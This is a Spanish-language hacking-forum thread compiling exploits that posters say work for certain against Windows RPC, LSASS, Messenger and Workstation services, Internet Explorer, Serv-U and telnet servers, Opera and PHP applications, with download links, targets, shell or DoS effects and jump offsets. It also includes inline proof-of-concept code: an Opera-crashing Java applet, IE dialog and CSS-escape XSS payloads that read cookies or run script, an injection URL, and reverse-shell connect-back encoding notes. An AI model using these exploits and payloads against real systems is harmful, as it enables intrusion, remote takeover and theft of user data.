Recopilatorio de Exploits Interesantes (-Actualizando-)

Wola...

Como todos sabeis, se ha descrito perfectamente QUE ES UN EXPLOIT Y COMO UTILIZARLO en los siguientes temas:

Como se Usan los Exploits??
@ http://foro.elhacker.net/index.php/topic,11830.0
FAQ Exploits y Recopilacion de post interesantes sobre EXPLOITS
@ http://foro.elhacker.net/index.php/topic,23643.0

pero algo q en mi opinion se echa en falta es un RECOPILATORIO DE EXPLOITS como "tema chincheta" del subforo de Exploits, en el cual se indique cuales de ellos realmente funcionan, contra que objetivos, características básicas, etc. (Es un intento a mayor escala de la iniciativa de postear cada uno el exploit, el sistema operativo y el offset q hemos encontrado que funciona, para mayor comodidad del resto del foro).

En la siguiente lista, me limito a describir brevemente aquellos que me han funcionado o se que funcionan fijo!!! (y cuando digo fijo, es pq realmente he comprobado q causan el DoS o q obtienen una shell remota)

Sintaxis de la descripción:

Código:

[!] NOMBRE DE LA VULNERABILIDAD

+ Nombre del exploit @ url donde encontrarlo
- Software vulnerable al ataque de este exploit
- Tipo de exploit
- Sobre offsets...

- Link foro.elhacker.net relacionado

Vulnerabilidades en Windows:

Citar

[!] MS03-026: Windows RPC DCOM Interface Buffer Overrun
+ dcom_final @ http://cyruxnet.org/download/rpcdcom/dcom_final.zip
- WINDOWS 2000 all SP / WINDOWS XP SP0
- Consigue Shell remota
- Offsets Universales

- http://foro.elhacker.net/index.php/topic,15974.0

Citar

[!] MS03-039: Windows RPC long filename Heap Overflow

+ RPC3 @ http://www.security.nnov.ru/files/rpc3.zip
- WINDOWS XP SP0
- DoS
- Offsets Universales

- http://foro.elhacker.net/index.php/topic,19710.0

Citar

[!] MS03-043: Windows Messenger Service Buffer Overflow
+ PoC @ http://www.k-otik.com/exploits/10.18.MS03-043.c.php
- WINDOWS 2000 SP4
- DoS
- Offsets Universales

- http://foro.elhacker.net/index.php/topic,20112.0

+ MrNice @ http://www.k-otik.com/exploits/12.16.MS03-043fr.c.php
- WINDOWS 2000 SP0
- Crea cuenta de usuario X y contraseña X
- 1er offset (WHAT): JMP [ESI+4C] @ cryptsvc.dll (w/ w32dasm)
2ndo offset (WHERE): seh pointer en Setundhanledexceptionfilter @ kernel32.dll (w/ ollydbg)

- http://foro.elhacker.net/index.php/topic,22574.0

+ Adik @ http://www.securitylab.ru/_exploits/msgr07.c.txt
- WINDOWS 2000 SP3 / WINDOWS XP SP1
- Consigue Shell Remota
- 1er offset: CALL [ESI+48] @ cryptsvc.dll para WINDOWS 2000 (w/ w32dasm)
1er offset: CALL [EDI+6C] @ rpcrt4.dll para WINDOWS XP (w/ w32dasm)

2ndo offset seh pointer en Setundhanledexceptionfilter @ kernel32.dll (w/ ollydbg)

Citar

[!] MS03-049: Windows Workstation Service WKSSVC.DLL Buffer Overflow

+ PoC Modificación de elhacker.net @ http://foro.elhacker.net/index.php/topic,22504.0
- WINDOWS 2000 SP0, SP2, SP3, SP4 con FAT32 File System
- Consigue Shell Remota
- Offset: JMP ESP @ msafd.dll (w/ findjmp)

+ Wirepair @ http://www.securitylab.ru/_exploits/0349.c.txt
- WINDOWS XP SP0
- Consigue Shell Remota
- Offset: JMP ESP @ wkssvc.dll (w/ findjmp)

- http://foro.elhacker.net/index.php/topic,23014.0

+ Firestorm @ http://www.security.nnov.ru/files/ntctl-03-49.c
- WINDOWS XP SP0
- Consigue Shell Remota
- Offset: JMP ESP @ wkssvc.dll (w/ findjmp)

- http://foro.elhacker.net/index.php/topic,24495.0

Citar

[!] MS04-007: Windows ASN.1 Library LSASS.EXE Integer Overflow

+ MS04-007-dos @ http://www.k-otik.com/exploits/02.14.MS04-007-dos.c.php
- WINDOWS 2000 SP4 / WINDOWS XP SP0
- DoS
- Offsets Universales

- http://foro.elhacker.net/index.php/topic,25458.0

Citar

[!] MS04-011: Windows LSASRV.DLL RPC Buffer Overflow

+ lsass @ http://www.k-otik.com/exploits/04252004.ms04011lsass.c.php
- WINDOWS 2000 SP4 / WINDOWS XP SP0, SP1
- Shell Remota para WINDOWS 2000 SP4 / DoS para WINDOWS XP SP0 / Shell Remota para WINDOWS XP SP1
- Offset WINDOWS 2000: JMP EBX @ netrap.dll (w/ findjmp)
Offset WINDOWS XP: JMP ESP @ lsass.exe (w/ findjmp)

- http://foro.elhacker.net/index.php/topic,30260.0

+ houseofdabus @ http://www.k-otik.com/exploits/04292004.HOD-ms04011-lsasrv-expl.c.php
- WINDOWS 2000 SP4 / WINDOWS XP SP0, SP1
- Shell Remota para WINDOWS 2000 SP4 / DoS para WINDOWS XP SP0 / Shell Remota para WINDOWS XP SP1
- Offset WINDOWS 2000: JMP EBX @ netrap.dll (w/ findjmp)
Offset WINDOWS XP: JMP ESP @ lsass.exe (w/ findjmp)

Vulnerabilidades en Internet Explorer:

Citar

[!] Microsoft Internet Explorer IFRAME Tag Overflow

+ Exploit original por Skylined @ http://www.k-otik.com/exploits/20041102.InternetExploiter.htm.php
- WINDOWS 2000 All SP / WINDOWS XP SP0, SP1 + INTERNET EXPLORER 6.0 o superior.
- Binds port 28876

- Paper con la Documentación técnica sobre cómo obtener una Shell remota a través de este exploit @ http://foro.elhacker.net/index.php/topic,45618.msg226575.html#msg226575

+ Exploit modificado para Reverse Shell por Gospel & L0redo @ http://foro.elhacker.net/index.php/topic,49300.0.html
- WINDOWS 2000 All SP / WINDOWS XP SP0, SP1 + INTERNET EXPLORER 6.0 o superior.
- Reverse Shell al puerto 8721 y dirección connectback IP especificada en la Shellcode, de acuerdo al siguiente algoritmo:

// Connnect back IP: 10.10.0.69 -> \x98\x98\x92\xD7 (XOReada con 0x92 en Hex)
// \x98\x98\x92\xD7 codificado en UTF-16 -> %u98**%u9298%u**D7

- Paper con la Documentación técnica sobre cómo obtener una Shell remota a través de este exploit @ http://foro.elhacker.net/index.php/topic,45618.msg228991.html#msg228991

Citar

[!] Microsoft Internet Explorer .ANI Files Handling Exploit

+ houseofdabus @ http://www.k-otik.com/exploits/20050123.HOD-ms05002-ani-expl.c.php
- WINDOWS 2000 All SP / WINDOWS XP SP0, SP1 + INTERNET EXPLORER 6.0 o superior.
- Crea el .html malicioso con el bind port especificado. Cuando se ejecuta el .html, conectar al puerto especificado con nc.

- http://foro.elhacker.net/index.php/topic,54746.0.html

+ Exploit modificado para Reverse Shell por L0redo @ http://foro.elhacker.net/index.php/topic,55876.0.html

Q este tema no sirva para q la gente empiece a preguntar dudas sobre la explotacion de estas vulnerabilidades, el empleo de estos exploits o como encontrar los offsets necesarios. Q para ello abrán nuevos hilos...

Gracias a todos por colaborar en esta iniciativa.

Salu2

Gospel

Chinchetazo al canto

Por lo demas, si alguien quiere añadir algun exploits, se añadira al post de Gospel.

Gospel, lo he modificado un poco para que las urls esten activas, simplemente he cambiado los CODE por QUOTE, salvo el primero. Tambien he puesto los titulos en mayusculas.

En un futuro, si hay muchos exploits, se creara un indice y tal para ellos, tanto para Linux como para Windows.

Salu2

Salu2

Exploits para servidores FTP y Telnet...

Citar

[!] Serv-U FTPD 3.x/4.x "SITE CHMOD" Command * Remote Stack Buffer Overflow

+ lion @ http://cnsteam.w6.ru/files/servu.c
- WINDOWS 2000 SP4
- Shell remota para WINDOWS 2000 / Se cae el servu contra WINDOWS XP SP0 / Puede que shell remota contra WINDOWS XP SP1
- Offsets Universales

- http://foro.elhacker.net/index.php/topic,24503.0

Citar

[?] Serv-U 3.x - 4.x - 5.x local privileges escalation SYSTEM Exploit NOT TESTED!!

+ Hax0rcitos @ http://www.k-otik.com/exploits/08082004.ServuLocal.c.php
- WINDOWS 2000 All / WINDOWS XP All
- Consigue Shell LOCAL (con privilegios de Administrador)
- (NOT TESTED: En cuanto alguien pueda confirmar q funciona, el aviso se hará oficial)

Citar

[!] Jordan Telnet Server Buffer Overflow

+ fiNis @ http://packetstormsecurity.nl/0401-exploits/wts_bo.c
- WINDOWS 2000 SP0, SP4 / WINDOWS XP SP0
- Consigue Shell Remota
- Offset: JMP ESP @ ntdll.dll (w/ findjmp)

- http://foro.elhacker.net/index.php/topic,23444.0

Salu2

Cojonuda iniciativa Gospel, tan solo una pekeña corrección:

Citar

MS04-011: Windows LSASRV.DLL RPC Buffer Overflow
+ houseofdabus @ http://www.k-otik.com/exploits/04292004.HOD-ms04011-lsasrv-expl.c.php
- WINDOWS 2000 SP4 / WINDOWS XP SP0
- Shell Remota para WINDOWS 2000 / DoS para WINDOWS XP

Si no recuerdo mal era válido también para wXP SP1 y proporcionaba shell sin problemas tanto para 2k como para XP.
De la descripcion que pones entiendo que al XP (y solo al SP0) le provoca un DoS...

Salu2

Y dos exploits (por ahora

) by me:

Citar

Exploit by Rojodos. Winamp 5.08 Stack overflow in in_cdda.dll

http://foro.elhacker.net/index.php/topic,55422.0.html

Exploit by Rojodos - Acrobat Reader 6.0.1 Buffer Overflow

http://foro.elhacker.net/index.php/topic,56127.0.html

A disfrutar

Aquí abajo no se ven estos exploits, tenía pensado añadirlos al recopilatorio junto con el exploit del Messenger .PNG, cuando este estuviera bien explicado... Añadiré otra sección para "Vulnerabilidades en Programas"...

Recuerda el objetivo de este hilo, recopilar sólo aquellos exploits q hemos tratado en el foro y sabemos q funcionan...

Gracias

Salu2

Aqui estan estos 2. De los cuales se hablaron mucho...

Citar

Exploit phpbb 2.0.XXX y como utilizarlo
http://foro.elhacker.net/index.php/topic,59840.0.html

Citar

Internet Explorer DHTML Object handling Exploit (MS05-020)
http://foro.elhacker.net/index.php/topic,66817.0.html

Por cierto buena lista ahora que la veo

Hasta Pronto

Vulnerabilidad ms05039 plug&play:
Consigue la shell en windows 2000 y provoca en windows 2003 y windows XP service pack 2 una elevación de permisos.
Mas información:
ms05039

Unete a la campaña contra educación para la ciudadanía:

version vulnerable:

Invision Gallery 2.0.3

Prueba de Concepto:

Código:

http://www.site.com/index.php?automodule=gallery&cmd=sc&cat=26&sort_key=date&order_key=DESC&prune_key=30&st=|Mousehack

Fuente:

Securityfocus

Salu2

interesante informacion extraida de securityfocus.Voy a tratar de traducir los detalles tecnicos del bug

a)usando un defecto del internet explorer, es posible obtener informacion confidencial del usuario que posea Google Desktop v2 instalado en su PC.
Normalmente, los browsers imponen restricciones fuertes para la interacción del dominio con el web browser. Se impone esta restricción para que el dueño de un sitio no pueda espiar en los hábitos de los que navegan en su sitio usando Javascript. También, si entra un usuario a cierto servicio (tal como Gmail u hotmail) una Web habría podido ejecutar ciertas operaciones en la cuenta del usuario (tal como abrir un email y hacer una lectura de él) si las restricciones existiesen.En el IE estas restricciones se mantienen pero están quebradas cuando ocurren importaciones CSS. Llamo este ataque CSSXSS u ¨Cascading Style Sheets Cross Site Scripting¨.

Una Web puede importar reglas CSS de un dominio usando el directorio "@import". El IE también tiene una función Javascript llamada "addImport" que funciona como "@import" . ¿Pero qué sucede cuando una Web importa un URL que no sea un archivo válido CSS? Parece que el IE permite que suceda esto y en la característica del "cssText" se pueda leer los snippets del código HTML del sitio remoto.

b)Al usar la técnica de CSSXSS un atacante conseguirá el código del Javascript. Sin embargo, él puede injectar caracteres CSS en la página vulnerable. Puesto que la mayoría de los sitios modernos son dinámicos y consiguen parámetros a través del URL, inyectar estos caracteres es generalmente trivial. Esto es parecido al Javascript que se inyecta en una página utilizando las vulnerabilidades clásicas de XSS solamente que aquí un atacante inyecta los caracteres que la mayoría de los sitios consideran inofensivos.

c)Como los agujeros clásicos de XSS, este defecto de diseño en el IE permite que un atacante recupere datos privados del usuario o ejecute operaciones remotas La diferencia está en que en este caso la web vulnerable no tiene que ser necesariamente vulnerable a el script injection. Todo lo que un atacante tiene que hacer es engañar a un usuario de una Web maliciosa. Los millares de sitios de la Web pueden ser explotados y no hay una solución simple contra este ataque. Eso significa que este defecto de diseño afectan a millones de usuarios del IE.

d)Esta vulnerabilidad se ha probado para trabajar en un browser completamente remendado del Microsoft Internet Explorer 6 y versiones anteriores.Mozilla Firefox no parece ser vulnerable a este tipo de ataque. Opera tampoco. Las soluciones posibles para que los usuarios atenúen este ataque serían inhabilitar Javascript en el IE o utilizar otro browser.

e)la explicacion tecnica de como funciona GOOGLE DESKTOP, es decir como interactua con el usuario que lo tiene instalado en su PC, lo encontraran en:

http://www.hacker.co.il/security/ie/css_import.html

f) prueba de concepto de como funciona el exploit:

http://www.hacker.co.il/security/ie/gdsexploit.html

Salu2

version Vulnerable 8.5 y anteriores

Detalles:
----------

El Navegador ópera es propenso a un remote denial of service

El problema se presenta cuando el navegador maneja un applet de Java que contiene una rutina de JNI.

Un ataque exitoso puede causar que el navegador se ¨cuelgue¨.

Prueba de Concepto:
------------------------

Código:

import java.applet.Applet;
import java.awt.Graphics;

import netscape.javascript.JSObject;

public class OperaTest extends Applet{
static {
System.out.println("Loaded 1.2");
}
public void paint(Graphics g) {
System.out.println("start");
try {
netscape.javascript.JSObject jso = JSObject.getWindow(this);
System.out.println(jso.getClass());
com.opera.JSObject j = (com.opera.JSObject ) jso;
char[] x = new char[1000000];
for (int y = 0 ; y < x.length; y++) {
x [y] = 'A';
}
String z = new String(x);
System.out.println("after evalb");
j.removeMember(z);
System.out.println("after remove");
}
catch (Exception e) {
e.printStackTrace();
}
}
}

Mi Prueba de Concepto (utilizando applet)

http://ciberia.ya.com/webmousehack/OperaCrash.html

Fuente:packetstorm

Salu2

Detalles:
----------
Microsoft Windows es propenso a un local denial of service.
Los informes indican que un proceso puede llamar a la funcion 'CreateRemoteThread' para provocar este problema.

Se informó que este ataque se puede llevar a cabo por un usuario local sin privilegios

Exploit:
--------

http://www.securityfocus.com/data/vulnerabilities/exploits/win_dos.c

fuente:securityfocus

Salu2

interesante informacion de como se podria utilizar un bug en internet explorer para instalar malware en una pc mediante ¨modal Dialog¨, que si bien se hablo con anterioridad de esto, en este caso veremos una aplicacion practica.

Informacion de Securityfocus:

a)creamos un html:

Código:

<HTML>
<SCRIPT>
//liudieyuinchina AT yahoo DzeroT com DzeroT cn
//ALL IE SECURITY MESSAGES!!!!!! always up2hour at http://iebug.com
//http://umbrella.name/
//message: davinci is still alive

location.href = "http://www.google.com/";
showModalDialog("md.htm",window).location = "JAVASCRIPT:alert(document.cookie)";
</SCRIPT>
</HTML>

donde ¨md.htm¨ contiene lo siguiente:

Código:

<HTML>
Close this dialog when google is loaded in the main window.

<SCRIPT>
//liudieyuinchina AT yahoo DzeroT com DzeroT cn
//ALL IE SECURITY MESSAGES!!!!!! always up2hour at http://iebug.com
//http://umbrella.name/
//message: davinci is still alive

window.returnValue = window.dialogArguments;
</SCRIPT>
</HTML>

ahora bien para mayor abundancia, y para ver y probar,y eventualmente modificar algo, les recomiendo que lean lo siguiente:

http://ciberia.ya.com/webmousehack/insiderdoc_by_jelmer.html

Salu2

POC:

<anytag
style="background:url("javascri\Dpt:/*/**/(function a()
{alert('JavaScript es ejecutado.')})();");"
/>

otras variantes que se pueden utilizar:

Código:

"\d"
"\D"
"\0d"
"\00000d"
"\d "
"\00000d "
"\a"
"\9"
e.t.c.

afecta a el Opera 8.51 y al Firefox 1.5, testeado con windows XP SP2

opiniones???

Salu2 boys

^{Inyeccción SQL en 'username' de PHPX
--------------------------------------------------------------------------------

Se reportó una vulnerabilidad en PHPX, que puede explotarse para realizar ataques de inyección SQL y comprometer un sistema vulnerable.

Fecha de Liberación: 2 de Diciembre de 2005
Ultima Revisión: 3 de Diciembre de 2005
Fuente: rgod

Sistemas Afectados

PHPX < 3.5.9

Riesgo
Altamente Crítico
Problema de Vulnerabilidad
Remoto
Tipo de Vulnerabilidad
Verificación deficiente en parametros.

Descripción

rgod reportó una vulnerabilidad en PHPX, que puede explotarse por personas maliciosas para realizar ataques de inyección SQL y comprometer un sistema vulnerable.

La entrada que se pasa al campo "username", cuando se ingresa a la sección de adminstración, no es verificada apropiadamente antes de utilizarse en una petición SQL. Esto podría explotarse para manipular las peticiones SQL inyectando código SQL arbitrario.

Además, puede explotarse para burlar el proceso de autenticación e ingresar a la sección de administración donde se puede cargar y ejecutar scripts de PHP arbitrarios.

Una explotación exitosa requiere que "magic_quotes_gpc" este deshabilitado.

La vulnerabilidad fue reportada en la versión 3.5.9 y anterior. Otras versiones también podrían ser afectadas.

Impacto

Security Bypass.

Manipulación de datos.

Acceso al sistema.

Solución

Editar el código fuente para asegurarse que la entrada es verificada apropiadamente.}

Apéndices
http://rgod.altervista.org/phpx_359_xpl.html

hard-h2o modding Foros de ayuda Yashira.org Videojuegos indetectables.net

Noticias Informatica Seguridad Informática ADSL Foros en español eNYe Sec

Todas las webs afiliadas están libres de publicidad engañosa.